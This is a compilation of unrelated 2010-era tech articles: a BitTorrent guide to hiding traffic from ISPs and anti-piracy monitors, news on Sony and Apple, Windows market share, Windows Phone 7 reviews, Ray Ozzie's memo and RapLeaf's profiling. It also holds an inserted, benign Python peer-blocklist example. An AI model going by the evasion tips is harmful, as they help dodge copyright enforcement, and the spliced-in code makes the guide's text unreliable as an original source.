For the purposes of this guide, we're focusing on two BitTorrent clients: uTorrent for Windows and Transmission for Mac OS X. That doesn't mean you can't use other clients like Vuze (or KTorrent and Transmission for Linux, if you are of the Linux persuasion), but there are just too many clients out there for us to give specific instructions for each. uTorrent and Transmission are some of the most popular clients out there, and they're our favorites here at Lifehacker, so where appropriate, we'll give you specific instructions for each client. Note that uTorrent for Mac is not nearly as mature as uTorrent for Windows, and may not have some of these features—so, in this particular case, when we reference uTorrent, we mean uTorrent for Windows.

Keep Your BitTorrent Speed and Privacy at the Max with a Few Simple Settings

BitTorrent clients have come a long way in the past few years, and where it used to be much more difficult to hide your BitTorrent activity, it's now a matter of checking the right boxes. Here are a few settings every BitTorrent user should have enabled.

Randomize and Forward Your Router Ports

If you're connected to your internet through a router, it's likely that many of your ports are closed, meaning your speeds will be much slower than you'd like. You'll need to let your router know which ones you want open for BitTorrent traffic, which is known as port forwarding. Furthermore, many ISPs or organizations (say, if your neighborhood or leasing company provides your internet) will block popular BitTorrent ports, so you'll want to switch up the port you use every once in a while to keep them guessing.

Both of these are extremely simple in uTorrent and Transmission. In uTorrent, just go to Options > Preferences and hit the Connection tab. Make sure all four boxes under the "Listening Port" section are checked—Enable UPnP Port Mapping, Enable NAT-PMP Port Mapping, Randomize Port Each Start, and Add Windows Firewall Exception.

In Transmission, open up the app's preferences and head to the Network pane. Check both the Randomize Port on Launch and Automatically Map Port boxes. If you see that the light next to the port's number goes from red to green, then you've successfully opened your current port to BitTorrent traffic, and you should notice a good increase in speed.

Note that for best results, you'll want to make sure your router is UPnP capable and has UPnP enabled. Most routers are UPnP ready, but if you find that you're having trouble, you may need to look at your router's manual and settings page to enable its use.

Encrypt Your BitTorrent Traffic

Nowadays, many internet service providers will throttle your bandwidth, prevent you from seeding, or do any other number of annoying things to try and stop you from torrenting. Apart from randomizing your ports, another thing you can do to try and keep them out is encrypt your traffic. It won't necessarily work on every client, but I've found that it nearly doubled my download speeds, so it's certainly worth a shot.

In uTorrent, go back to the preferences and hit up the BitTorrent section in the left sidebar. Under Protocol Encryption, open the dropdown menu labeled Outgoing. You have three options: Disabled, Enabled, and Forced. Try Enabled for a while, but if you don't see a good speed increase, using the Forced setting might give you better results. Also note the Allow Incoming Legacy Connections checkbox—if you have a specific torrent that doesn't have a lot of people seeding, you might want to check this box temporarily, though I try to keep it unchecked whenever I can. This ensures that any peers you connect to will use encryption and that your ISP will be less likely to throttle you.

In Transmission, head over to the Peers pane of the app's preferences and check the Encryption section. Definitely check the "Prefer Encrypted Peers" box, and I'd highly recommend checking the "Ignore Unencrypted Peers" box, though again, if you are noticing that there aren't a lot of peers connecting for a specific torrent, try unchecking it to see if that helps your speeds.

Block Peers that Might be Snooping

Even worse than throttling ISPs is the threat of the snooping RIAA, MPAA, or other organization looking to take you down. Often, they'll post fake torrents of copyrighted material (or just join in on real ones) and track those downloading, leading them right to an unprepared you. While there is no foolproof way to avoid them, a really great, simple way is to use a peerblocker. Transmission has this feature built-in, while Windows users will need to use a separate program.

If you're a Mac user, open up Transmission's preferences and head back to the Peers pane. This time, check the box that reads "Prevent Known Bad Peers from Connecting" down under the Blocklist section. Hit the update button to make sure the list of bad peers is recent, and check the Automatically Update Weekly box to keep it up to date.

Windows users will need to download previously mentioned PeerBlock (an updated version of the seemingly defunct, previously mentioned Peer Guardian 2) to block the big boys from snooping. The first time you run it, it'll take you through a setup wizard, in which you can decide who you want to blacklist. Check the box for anti-P2P organizations (as well as anything else you may want, though the P2P box is the only important one for BitTorrent) and schedule it to update as often as you want. You might as well update it every day; there's no reason to be stingy with your privacy here. Then, just make sure it runs when you use your BitTorrent client—it'll keep you safe from those bad peers.
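How a range-based peer blocklist of the kind described above decides whether to refuse a peer, as an added example that is not part of the original guide and is not PeerBlock's or Transmission's own code. It assumes the PeerGuardian-style plain-text list format (`label:start-end`, one IPv4 range per line); the list entries, labels and peer addresses are constructed from documentation address ranges.

```python
import bisect
import ipaddress

# Constructed sample in the assumed "label:start-end" text format.
# Addresses are RFC 5737 documentation ranges, not real blocklist entries.
SAMPLE_BLOCKLIST = """\
# constructed sample, not a real blocklist
Example Monitoring Org:192.0.2.0-192.0.2.127
Example Monitoring Org (overlap):192.0.2.64-192.0.2.255
Example Media Group: East Office:198.51.100.10-198.51.100.20
Adjacent range:198.51.100.21-198.51.100.30
this line is malformed
Reversed range:203.0.113.50-203.0.113.10
"""


def parse_p2p_blocklist(text):
    """Return (ranges, rejected); ranges holds (start_int, end_int, label) tuples."""
    ranges, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Labels may themselves contain ':', so split on the last one.
        label, sep, span = line.rpartition(":")
        start_s, dash, end_s = span.partition("-")
        try:
            if not sep or not dash:
                raise ValueError("missing ':' or '-'")
            start = int(ipaddress.IPv4Address(start_s.strip()))
            end = int(ipaddress.IPv4Address(end_s.strip()))
            if start > end:
                raise ValueError("range start is after range end")
        except ValueError as exc:
            # A bad line is reported, never silently turned into a rule.
            rejected.append((lineno, line, str(exc)))
            continue
        ranges.append((start, end, label.strip()))
    return ranges, rejected


def merge_ranges(ranges):
    """Coalesce overlapping or adjacent ranges so lookups can binary-search."""
    merged = []
    for start, end, label in sorted(ranges):
        if merged and start <= merged[-1][1] + 1:
            prev_start, prev_end, labels = merged[-1]
            merged[-1] = (prev_start, max(prev_end, end), labels + [label])
        else:
            merged.append((start, end, [label]))
    return merged


class Blocklist:
    def __init__(self, text):
        ranges, self.rejected = parse_p2p_blocklist(text)
        self.merged = merge_ranges(ranges)
        self._starts = [r[0] for r in self.merged]

    def match(self, peer_ip):
        """Return the labels of the range covering peer_ip, or None if allowed.

        Raises ValueError if peer_ip is not an IP address at all.
        """
        addr = ipaddress.ip_address(peer_ip)
        if addr.version == 6:
            # An IPv4-only list can only judge IPv4-mapped IPv6 addresses;
            # native IPv6 peers fall outside it and are therefore allowed.
            addr = addr.ipv4_mapped
            if addr is None:
                return None
        value = int(addr)
        i = bisect.bisect_right(self._starts, value) - 1
        if i >= 0 and value <= self.merged[i][1]:
            return self.merged[i][2]
        return None


def screen_peers(blocklist, peers):
    """Split peers into (allowed, blocked) before any connection is made."""
    allowed, blocked = [], {}
    for peer in peers:
        labels = blocklist.match(peer)
        if labels is None:
            allowed.append(peer)
        else:
            blocked[peer] = labels
    return allowed, blocked


if __name__ == "__main__":
    bl = Blocklist(SAMPLE_BLOCKLIST)
    for lineno, line, why in bl.rejected:
        print(f"rejected line {lineno}: {line!r} ({why})")
    # Constructed peer addresses, as a tracker response might list them.
    peers = ["192.0.2.200", "198.51.100.31", "::ffff:192.0.2.5", "2001:db8::1"]
    allowed, blocked = screen_peers(bl, peers)
    print("allowed:", allowed)
    print("blocked:", blocked)
```

A peer outside every listed range is allowed, so the list covers only the addresses its maintainers already know about, which is why update frequency matters.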

Automate Your Client and Free Up Bandwidth

These are some tricks that have been around for a while, and they won't exactly keep Big Brother off your back, but they are useful for keeping BitTorrent from overtaking your internet connection, especially if you've experienced some heavy speed increases from the above tips. Here are a few ways to automatically manage BitTorrent's use of your bandwidth.

Set Global Bandwidth Limits

BitTorrent downloads and uploads can hog a lot of your internet connection's bandwidth, especially if you're sharing popular content. The simplest way to keep BitTorrent from hogging your connection is to set global upload and download limits. In uTorrent, you can find them in the Connection section of the Preferences. The settings are fairly self-explanatory—just set your max upload and download rates (in kB/s), or choose 0 to keep the rates unlimited.

In Transmission, it's under the Bandwidth pane of the app's preferences—just check the "Download Rate" and "Upload Rate" boxes and set your speeds however you want. You can also set a "Speed Limit" mode, if you want to switch between two different bandwidth limits—say, give it more bandwidth when you're just checking email and the like, and cut the limits down when you need that bandwidth for streaming video or online gaming.

Throttle Your BitTorrent Downloads on a Schedule

You could just quit your BitTorrent client (or manually turn on Speed Limit mode) whenever you want to conserve your bandwidth, but if you're like me, you'll forget to start it back up—meaning you'll end up delaying your downloads (most likely until you want whatever was supposed to be downloading, at which point you will slap your forehead).

To remedy this situation, uTorrent and Transmission both come with simple Scheduler features that you can access through the Preferences. In uTorrent, go to Options > Preferences, then find Scheduler in the sidebar. Tick the box next to "Enable Scheduler" and you'll see a grid of green boxes light up. The grid runs Monday through Sunday, midnight to midnight (or 0:00 to 23:59), one box per hour. Here's how it works:

• Dark green boxes indicate that uTorrent will download and upload at full speed (or whatever you've set as its full speed).
• Light green boxes indicate limited download and upload rates.
• White boxes indicate that uTorrent will not download or upload any content.
• Pink boxes indicate that uTorrent will only seed, not download. I'm not exactly sure when one would be inclined to use this, but it's there if you want it.

I've always got a little bandwidth to spare on my connection, but I certainly don't want uTorrent hogging my bandwidth while I'm working, so I set the Scheduler to limit speeds from 8am to midnight every day. During the wee hours of the morning, when I'm very unlikely to be at my computer, I open the flood gates and give uTorrent unlimited upload/download speeds. Also, since I generally stay away from my computer on Saturday, I keep uTorrent at full throttle. See the screenshot above to see what this sort of schedule would look like. Like I said, my connection can handle a little bit of bandwidth bleeding all of the time, so when I'm running at limited rates, I set my upload speed to 5 kB/s and my download speed to 15. Handy, huh?

In Transmission, it's a bit more basic. Just open up Transmission's Preferences and go to the Bandwidth tab. You only have two modes instead of three—your global bandwidth limits and Speed Limit mode. You can schedule the speed limit mode to turn on and off at a specific time either every day, on weekdays, weekends, or on a specific day of the week. It's not quite as flexible as uTorrent's scheduler, but works well enough—I'll generally just limit its speed during the day, and let it tear up my connection when I'm sleeping.

Ensure a good share ratio without wasting extra bandwidth

As Adam mentioned in our beginner's guide, an important part of BitTorrent is sharing, and a good member of the BitTorrent community gives as much as he/she takes. In fact, many sites, especially private trackers, keep a close eye on your share ratio and may even ban you if you don't keep your ratio above a certain point (i.e., if you are a "leecher"). This isn't as widespread as it used to be, but it does still happen—and besides, sharing is just a nice thing to do. I'm in total agreement of the whole share-and-share-alike attitude, but once I've shared an equal part of what I've downloaded, I don't want to waste too much extra bandwidth on that torrent.

Rather than constantly checking your torrent ratios so you can remove them as soon as they cross the 1.0 barrier, go to the Queuing section of uTorrent and find the "Seed While" section. There you can set a goal ratio for a file you're sharing, then set how much bandwidth uTorrent will allocate to the torrent once that goal is reached (in the screenshot, for example, uTorrent will stop sharing the file after its share ratio reaches 150%). If you prefer, you can just limit the upload rate when uTorrent reaches its goal by checking the corresponding box at the bottom of the window.

In Transmission, head to the Transfers pane of the preferences and click on the Management tab. Check the box that says Stop Seeding at Ratio and set the ratio to whatever you want, like 1.50 (meaning when your ratio reaches 150%).

External Solutions for Hiding Your Traffic

We won't go into too much detail here (as these solutions could be posts of their own), but we thought some of the more extreme measures deserved mentions in this guide. Here are a few other ways to really keep others out of your business.

Use a VPN

While there are a number of great solutions to hide your identity while downloading, using a VPN is usually a very cheap and popular way to do so. You can use any number of VPN services (like previously mentioned ItsHidden), which will route your traffic through another server, keeping your IP address away from prying eyes.

Set up a Proxy

One of the other popular methods of obscuring yourself is using a proxy, which works similarly to a VPN. You could roll your own SSH proxy or use something a bit easier like BTGuard, which we've covered how to do before. You very well may see a speed drop when using this method, though, so if speed is more important to you than privacy, this may not be the best route to go.

As always, this guide is not all-encompassing. There are any number of tweaks, methods, and preferences that you could use to quicken, hide, or all-around improve your BitTorrent downloads. If you have any favorite settings we didn't cover, share them with us in the comments.

Sony Shares Rise on Speculation of Apple Interest

Shares of Sony Corp rose nearly 3 percent at one stage on Tuesday as traders cited media reports speculating that the Japanese electronics maker could be a potential acquisition target of Apple Inc.

Helping to spark the speculation was a Saturday report in Barron's that said cash-rich Apple could be contemplating a big acquisition and noted speculation about Adobe, Sony and Disney as potential targets.

Sony spokeswoman Sue Tanaka said: "We cannot comment on rumors or speculation."

During an October 18 conference call with investors and reporters following Apple's latest earnings announcement, CEO Steve Jobs was asked what the company would do with its $51 billion in cash.

"We would like to continue to keep our powder dry, because we do feel that there are one or more strategic opportunities in the future," Jobs said.

Some analysts were skeptical about the feasibility of a buy-out.

"If Apple tries to buy the whole of Sony, it will be a hostile takeover, and that will probably not succeed in Japan," said one analyst in Tokyo, who declined to be named.

"I don't think Sony would want to join hands with Apple since it is working with Google to compete against Apple," he added.

Sony shares closed up 0.7 percent at 2,742 yen after climbing as high as 2,804 yen. Trading volume was 17.61 million shares, the highest since July 30, the day after the company surprised the market with a quarterly profit and raised its full-year profit outlook.

The benchmark Nikkei average fell 0.3 percent.

(Reporting by Chikafumi Hodo, Sachi Izumi and Isabel Reynolds; Editing by Chris Gallagher)

Microsoft vs. Apple: Who's Winning? The Numbers Don't Lie
Ed Bott

Microsoft has been at the top of the heap for almost as long as people have used PCs. They’ve managed to sustain an overwhelming competitive advantage, even after a decade’s worth of antitrust action and the astonishing transformation of Apple into a profit-making machine that has built one billion-dollar business after another while the entire rest of the tech industry is stuck in neutral. Indeed, the presence of Apple and Google as direct competitors suggests that maybe Microsoft is overdue to take a tumble.

There is never a shortage of Apple-versus-Microsoft yammering in the blogosphere, but I haven’t seen much in the way of actual data. Is Apple really making a dent in Microsoft’s long-standing Windows monopoly? Are mobile devices like the iPhone and iPad taking over tasks that used to be done by PCs? Sales figures tell part of the story, but in my opinion the best data comes from analyzing how devices are being used in the real world. I went off in search of hard numbers, and I found them at the same source I used earlier this year to measure Windows 7 adoption rates (see When will XP finally fade away?).

Net Market Share publishes snapshots of PC usage based on data from 160 million visits per month to its large collection of sites (the exact methodology is here). Its monthly reports on operating system versions contain a wealth of detailed information about even the most obscure OSes, and they’ve tracked the performance of mobile platforms consistently for the past three years. To compile the charts in this post, I went beyond the simple summary reports and dug deep into the details, recording and cross-tabulating data for desktop and mobile OSes from November 2007 until October 2010. I found four unmistakable trends.

Windows XP continues its steady decline. In early 2008, more than a year after Microsoft launched Windows Vista, Windows users had emphatically rejected that upgrade. Fewer than 10% of Windows users had switched, and nearly 5% of all Windows PCs in use were running Windows versions older than XP. The Windows 7 story is very, very different. One year after the release of Windows 7, it has made a significant dent in the Windows user base, and those diehards holding on to pre-XP versions have mostly surrendered. XP’s share of actual usage has declined more than 20 percent in two years, and that trend is accelerating.

There’s no evidence that the marketplace is abandoning Windows to any significant degree. The overall share of Internet traffic from Windows PCs has dropped slightly in the past two-and-a-half years, from 95.4% to 91.1%. But that’s true across the board for competing desktop OSes as well. Linux usage is down dramatically in 2010, to 0.85% from an all-time high of 1.08% in early 2009. Interestingly, OS X usage is also down, dropping by roughly a quarter of a percentage point since a year ago, from 5.26% to exactly 5.00%. In relative terms, that’s almost exactly the same overall drop as the Windows platform has seen in the same period.

Apple is still gaining on Microsoft, thanks to iOS-based devices. There’s no doubt that the Mac has been a big success for Apple over the past couple of years. While Microsoft was stumbling with Vista, Apple used a very aggressive advertising campaign that resulted in considerable growth of OS X usage, at least in relative terms. The Net Market Share stats confirm that OS X’s share of Internet usage rose from 3.45% in early 2008 to more than 5% last year. As I noted earlier, the Mac’s momentum has stalled (which might explain Apple’s sudden “Back to the Mac” event last week). But Apple’s overall share of the Internet continues to go up steadily, thanks to mobile devices like the iPhone and iPad. Added together, Apple’s one-two punch of OS X and iOS has been a clear winner. It will be interesting to look at these figures again in a year.

The mobile Internet is growing at an astonishing rate. This was the most fascinating set of numbers to me, and they’re also the ones that should have Microsoft most concerned. Back in 2007, Internet traffic from mobile devices was nearly nonexistent; today, mobile operating systems account for nearly 3% of all Internet traffic. The percentage of Internet usage on mobile devices has been doubling every eight months or so. If you extrapolate that trend, it’s easy to imagine a world in which mobile devices consume 20% or more of total Internet usage within the next two or three years.

So where is all that traffic coming from? Not surprisingly, Apple’s iOS-based devices are the leader in the mobile category, as measured by usage, accounting for 42% of the total traffic from mobile sources. The very close runner-up, at 37%, is a big surprise: Java Platform, Micro Edition (Java ME), presumably running mostly on Nokia feature phones. Symbian is a distant third at 11%, with Android in fourth at 8%.

We are indeed moving rapidly into a world where mobile devices are taking over many tasks that were previously handled by PCs. The big question is whether (and if so, when) that growth curve levels off. This is a market that is only beginning to explode, which means things can change very quickly. I’ll be looking closely at these monthly numbers over the next year, especially with Microsoft jumping into this space so aggressively with Windows Phone 7.

Early Windows Phone 7 Reviews Agree: Too Little, Too Late

Do smartphones running Windows Phone 7 OS stand a chance with consumers? Maybe, but apparently not with the critics
Daniel Ionescu

The first reviews of Microsoft's new Windows Phone 7 are in. Smartphones running the new OS will soon join the millions of iPhone and Android phones, but do they stand a chance? Reviewers are skeptical about the immediate success of Windows Phone 7 devices, as they are missing too many features, but still see a chance for Microsoft's shiny new user interface.

What's missing in Windows Phone 7 are features that were not included in some early versions of the iPhone or Android: copy and paste, multitasking, HTML5 support, universal search, and Adobe Flash support. Apple and Google, however, had a couple of years head start to work on these issues, most of which are now solved. So is Windows Phone 7 offering too little too late? Here's what the first reviews are saying.

PC World's Ginny Mies spent some time with Windows Phone 7 devices and thinks Microsoft has done "an excellent job" with the user interface, performance, and functionality. However, Mies notes, the absence of features like copy and paste, third-party multitasking, and Flash support "are big disappointments and set the OS behind both the Android and iPhone OSs."

The Wall Street Journal's Walt Mossberg is also not convinced about Windows Phone 7: "Overall, I can't recommend Windows Phone 7 as being on a par with iPhone or Android -- at least not yet." He notes in his review he "couldn't find a killer innovation that would be likely to make iPhone or Android users envious," and he sees "Windows Phone 7 as inferior to iPhone and Android for most average users. It's simply not fully baked yet."

Computerworld's Dan Rosenbaum thinks Microsoft made the right choice "in choosing between the simplicity and elegance of the iPhone and the power and deep configurability of Android. Microsoft has plainly (and perhaps surprisingly) opted for the former." He says the new OS is "genuinely innovative, but whether you should buy it on Day One depends largely on your appetite for new things."

Reviewing for Engadget, Joshua Topolsky writes that Windows Phone 7 "is a good year behind market leaders right now, and though it's clear the folks in Redmond are doing everything they can to get this platform up to snuff, it's also clear that they're not there yet." Despite this, "Microsoft has done an outstanding job with lots of aspects of this UI, particularly when it comes to navigation and ease of use -- but there are holes here as well," Topolsky notes.

Cnet's Bonnie Cha argues that "it's absolutely mind-boggling that Windows Phone 7 is missing some very fundamental features, like copy/paste, third-party multitasking, and universal search." She concludes that "Microsoft's long road to a comeback won't be an easy one, but at least it's now headed down the right path."

Gizmodo's Matt Buchanan is much more impressed, however: "Windows Phone 7 is really great. A solid foundation, it's elegant and joyful. True, a lot of that greatness is potential. But if anybody can follow through on their platform, it's Microsoft." But he avoids recommending it over an iPhone or Android device right now: "In six months, after the ecosystem has filled out, the answer will be more clear."

Departing Microsoft Visionary Ray Ozzie Sees "Post-PC" World
Bill Rigby

Microsoft Corp's resident visionary and departing software chief has urged the company to move on from its Windows and Office roots and imagine a "post-PC world" of simple, global Web devices.

Five years after Ray Ozzie made his mark with his "Internet Services Disruption" memo -- regarded as Microsoft's manifesto for Internet-based "cloud computing" -- he is again calling on the software giant to envision a future where simplicity is key.

Ozzie's emotional call to arms comes alongside what some analysts say is a watershed moment for the third largest company on the Standard & Poor's 500, which in November will see the first of a new generation of smartphones driven by its operating system hit store shelves, in a belated attempt to become a major player again in the booming wireless devices market.

"Let's mark this 5-year milestone by once again fearlessly embracing that which is technologically inevitable," Ozzie said in a personal blog post addressed to executive staff and direct reports.

"The next five years will bring about yet another inflection point -- a transformation that will once again yield unprecedented opportunities for our company and our industry catalyzed by the huge and inevitable shift in apps and infrastructure that's truly now just begun."

That world, Ozzie argues, will be one where users access always-available services through "devices that are fundamentally appliance-like by design, from birth. They're instantly usable, interchangeable and trivially replaceable without loss."

The call from Ozzie, who announced his retirement from Microsoft last week, is meant to galvanize the company, which has fallen behind Apple Inc and Google Inc in the rapidly growing phone and tablet computer sector and has been surprised by phenomena such as social network Facebook.

"Close our eyes and form a realistic picture of what a post-PC world might actually look like, if it were to ever truly occur," wrote Ozzie in a memo posted on his personal blog on Monday. "Those who can envision a plausible future that's brighter than today will earn the opportunity to lead." (To read Ozzie's blog post, click here link.reuters.com/nam22q)

Disruption Again

Shortly after joining Microsoft, Ozzie wrote his now famous "Internet Services Disruption" memo in which he evangelized now-common cloud computing, where data and software are supplied over the Internet rather than installed on machines.

In Monday's blog, Ozzie said some of the goals he envisioned five years ago "remain elusive and are yet to be realized."

He goes on to praise competitors for "seamless fusion of hardware and software and services," which appears to be a nod to Apple's iPhone and Google's Android phone system and application marketplaces, which are proving more popular with consumers than Microsoft's own offerings.

"Their execution has surpassed our own in mobile experiences," said Ozzie.

Microsoft's new phone software will be available on handsets in the United States next month and a slew of Windows-powered tablet devices are expected next year.

Instead of a tech world founded on PCs and software -- which Microsoft's Windows operating system and Office suite of programs essentially created -- Ozzie urges Microsoft to think about "cloud-based continuous services that connect us all and do our bidding" and "appliance-like connected devices enabling us to interact with those cloud-based services."

Such devices could be at home, in the car, controlling elevators or highways, said Ozzie.

"Today's PC's, phones and pads are just the very beginning," said Ozzie. "We'll see decades to come of incredible innovation from which will emerge all sorts of 'connected companions' that we'll wear, we'll carry, we'll use on our desks and walls and the environment all around us."

If accurate, that represents a long-term threat to Microsoft, whose core Windows and Office units make up more than half of the company's $62 billion annual sales and 80 percent of its operating profit.

Ozzie, 54, is working on some of Microsoft's entertainment projects before retiring from the company in several months. He took over the role of Chief Software Architect from co-founder Bill Gates in 2006.

Gates started the tradition of the "call to action" internal memo, his most widely read being the "Internet Tidal Wave" memo in 1995, which urged the company to put the Web at the center of all its efforts.

Chief Executive Steve Ballmer said there are no plans to appoint a new chief software architect when Ozzie retires.

(Editing by Edwin Chan, Andre Grenon and Richard Chang)

A Web Pioneer Profiles Users by Name
Emily Steel

In the weeks before the New Hampshire primary last month, Linda Twombly of Nashua says she was peppered with online ads for Republican Senate hopeful Jim Bender.

It was no accident. An online tracking company called RapLeaf Inc. had correctly identified her as a conservative who is interested in Republican politics, has an interest in the Bible and contributes to political and environmental causes. Mrs. Twombly's profile is part of RapLeaf's rich trove of data, garnered from a variety of sources and which both political parties have tapped.

RapLeaf knows even more about Mrs. Twombly and millions of other Americans: their real names and email addresses.

This makes RapLeaf a rare breed. Rival tracking companies also gather minute detail on individual Americans: They know a tremendous amount about what you do. But most trackers either can't or won't keep the ultimate piece of personal information—your name—in their databases. The industry often cites this layer of anonymity as a reason online tracking shouldn't be considered intrusive.

RapLeaf says it never discloses people's names to clients for online advertising. But possessing real names means RapLeaf can build extraordinarily intimate databases on people by tapping voter-registration files, shopping histories, social-networking activities and real estate records, among other things.

"Holy smokes," says Mrs. Twombly, 67 years old, after The Wall Street Journal decoded the information in RapLeaf's file on her. "It is like a watchdog is watching me, and it is not good."

Some early adopters of the service are political campaigns. Democratic political consultant Chris Lehane used RapLeaf in a successful campaign against Proposition 17 in California, which would have changed the way auto-insurance rates are set in the state.

RapLeaf ranks among the most sophisticated players in the fast-growing business of profiling people online and trading in personal details of their lives, an industry that is the focus of a Journal investigation. The San Francisco startup says it has 1 billion e-mail addresses in its database.

RapLeaf acknowledges collecting names. It says it doesn't include Web-browsing behavior in its database, and it strips out names, email addresses and other personally identifiable data from profiles before selling them for online advertising.

Nevertheless, the Journal found that, in certain circumstances, RapLeaf had transmitted identifying details about Mrs. Twombly—such as a unique Facebook ID number, which can be linked back to a person's real name—to at least 12 companies. The Journal also found RapLeaf had transmitted a unique MySpace ID number (which is sometimes linked to a person's real name), to six companies. MySpace is owned by News Corp., which publishes the Journal.

RapLeaf says its transmission of Facebook and MySpace IDs was inadvertent and the practice was ended after the Journal brought it to the company's attention. The company says people can permanently opt out of its services at RapLeaf.com.

RapLeaf executives say their business offers valuable consumer benefits by allowing people to see relevant advertising and content. "The key goal of RapLeaf is to build a more personalizable world for people," says RapLeaf CEO Auren Hoffman. "We think a more personalizable world is a better world."

When a person logs in to certain sites, the sites send identifying information to RapLeaf, which looks up that person in its database of email addresses.

Then, RapLeaf installs a "cookie," a small text file, on the person's computer containing details about the individual (minus name and other identifiable facts). Sites where this happened include e-card provider Pingg.com, advice portal About.com and picture service TwitPic.com.

In some cases, RapLeaf also transmits data about the person to advertising companies it partners with.

Data gathered and sold by RapLeaf can be very specific. According to documents reviewed by the Journal, RapLeaf's segments recently included a person's household income range, age range, political leaning, and gender and age of children in the household, as well as interests in topics including religion, the Bible, gambling, tobacco, adult entertainment and "get rich quick" offers. In all, RapLeaf segmented people into more than 400 categories, the documents indicated.

RapLeaf's privacy policy states it won't "collect or work with sensitive data on children, health or medical conditions, sexual preferences, financial account information or religious beliefs."

After the Journal asked RapLeaf whether some of its profile segments contradicted its privacy policy, the company eliminated many of those segments. Segments eliminated include: interest in the Bible, Hispanic and Asian ethnic products, gambling, tobacco, adult entertainment, "get rich quick" offers and age and gender of children in household.

RapLeaf says many of its segments are also "used widely by the direct-marketing industry today."

In this year's hotly contested midterm elections, some political organizations are tapping RapLeaf's technology. With traditional postal mailing lists, "We used to bombard their house with mail. Now we can bombard their house with online ads," says Robert Willington, the Republican online campaign strategist who worked on behalf of Mr. Bender's New Hampshire campaign.

RapLeaf helped Mr. Bender's campaign target likely Republican voters with ads online. (Mr. Bender, who confirms working with RapLeaf, lost the election.)

In Mr. Lehane's California effort against Proposition 17 this year, RapLeaf found online about 200,000 suburban women over the age of 40 in Southern California, a demographic the campaign considered swing voters.

Mr. Lehane says the 4-percentage-point margin of defeat suggested the technology was effective. "With an election that close, every voter you can reach matters," he says.

Mr. Lehane says he was considering using RapLeaf as part of a campaign against Meg Whitman, who is running for governor in California. That campaign is being run by a political group, Level the Playing Field 2010, which was funded by several labor unions and which Mr. Lehane led.

RapLeaf says it has participated in about 10 campaigns this season, declining to identify them. "We expect that forward-thinking campaigns will begin to use it this year more widely as an alternative to direct mail, email and phone calls," says Joel Jewitt, RapLeaf's vice president of business development.

Co-founded in 2006 by Mr. Hoffman, a Silicon Valley entrepreneur, RapLeaf began as an online service letting people rate each other based on their business transactions.

The company raised an initial $1 million in funding from well-known Silicon Valley investors including PayPal co-founder and Facebook investor Peter Thiel. A person familiar with the situation says the company closed a $15 million fund-raising round this month.

Soon after it was founded, RapLeaf began "scraping"—or collecting information from—social networks to build a people search engine. It matched data from social-networking profiles with email addresses. RapLeaf says data it collects are public. It sold a service giving companies information about the customers on their e-mail lists.

By 2009, RapLeaf had indexed more than 600 million unique email addresses, it said in a press release that year, and was adding more at a rate of 35 million per month. Meanwhile, the business of helping marketers with their email lists (RapLeaf's core) was lagging in the recession. And the online-tracking business was taking off.

The Wall Street Journal analyzed the tracking files installed on people's computers by the 50 most popular websites, plus WSJ.com.

RapLeaf's Mr. Jewitt says the company saw an opportunity: It decided to connect its database of dossiers on people to cookies placed on those same individuals' computers, for ad targeting. "If you are a modern information company, you have to be involved in that," he says.

Combining off-line profiles with online tracking has raised red flags ever since another company first tried it 10 years ago. Privacy advocates argued that connecting people's Web-browsing habits with their names was too intrusive.

RapLeaf says it doesn't share or sell emails. However, under some circumstances it will provide names and other personal details if a client already possesses that person's email address.

For example, a company might come to RapLeaf with an email-address mailing list, and RapLeaf will try to provide information about the people on that list. This year, RapLeaf began offering services to target these people with online ads for the client.

For that to work, RapLeaf relies on a network of cooperating websites that use email addresses as part of the sign-on process. Those sites agree to transmit their users' email addresses (in encrypted form) to RapLeaf. Then, RapLeaf "drops," or installs, cookies on users' computers.

It's tough to build up a network of such sites, because many don't want to let outsiders track their visitors. This summer, RapLeaf sent a marketing email offering to pay one website an unspecified sum for this kind of access, according to documents reviewed by the Journal. The website chose not to take the offer.

RapLeaf declined to name the sites it works with, citing nondisclosure agreements. The Journal found that sites installing RapLeaf cookies included About.com, owned by the New York Times Co.; online invitation site Pingg.com; photo-sharing sites TwitPic.com and Plixi.com; movie site Flixster.com; discount site Tester-Rewards.com; and some Facebook.com and MySpace.com applications.

The Journal last week reported on the Facebook and MySpace apps sending data to RapLeaf. Both sites say they prohibit applications from sharing user data with outside data companies, and that they took steps to stop the apps that were transmitting user data to RapLeaf.

A Facebook spokesman says the company is acting to "dramatically limit" the exposure of users' personal information. Facebook says the user ID allows access only to information that Facebook requires people to make public in their profile.

MySpace says it uses RapLeaf data for its "friend recommendation" system, but doesn't share user data or let RapLeaf track MySpace users.

After receiving user IDs from some MySpace and Facebook apps, RapLeaf was then transmitting data about users to its advertising partners. After being contacted by the Journal, RapLeaf says it "acted immediately" to strip out identifying information from the data it shared with partners.

An About.com spokeswoman says the company doesn't have a relationship with RapLeaf. She says users' information was sent to RapLeaf via a partner that operates on its site, and that About.com wasn't aware its users' email addresses were being sent to RapLeaf.

Plixi.com says the company is "in experiment mode right now with behavioral-targeting companies like RapLeaf." Flixster.com says it "does not sell any of our users' personal information to anyone" and declined to comment further.

Pingg.com declined to comment. TwitPic and Tester-Rewards didn't respond to requests for comment.

The Journal decoded RapLeaf's information on Gordon McCormack Jr., a 52-year-old who lives in Ashland, N.H. RapLeaf correctly identified Mr. McCormack's income range, number of cars (one), his interests in gardening and the Beatles, and his interest in playing the online game Mafia Wars, among other topics.

Mr. McCormack says he plays Mafia Wars almost every day before going to bed.

RapLeaf also identified Mr. McCormack as someone with an interest in online personals. He says he isn't currently active in online dating, but might have a couple of profiles "lurking on the Internet."

When Mrs. Twombly, the New Hampshire Republican, registered at Pingg.com using her email address, RapLeaf matched her to dozens of "segments," according to a Journal analysis of the computer code transmitted while she was on the site.

The Journal was able to decode 26 of the segments, including her income range and age range and the fact that she is interested in the Bible and in cooking, crafts, rural farming and wildlife. Mrs. Twombly says all the decoded segments describe her accurately.

RapLeaf says some of the segments in Mrs. Twombly's and Mr. McCormack's profiles "do not exist," possibly due to changes in RapLeaf's overall segment list in the time since their web traffic was decoded for this article last month.

In Mrs. Twombly's case, RapLeaf transmitted data about her to at least 23 data and advertising companies after she logged into Pingg, according to the analysis of the computer code.

Twenty-two companies, including Google's Invite Media, confirmed receiving data from RapLeaf. RapLeaf declined to comment on its relationships with the companies.

Since talking with the Journal, Mrs. Twombly tweaked her Web browser to limit cookie installation. As a result, she says, some websites don't always work properly for her, a common side effect of restricting cookies.

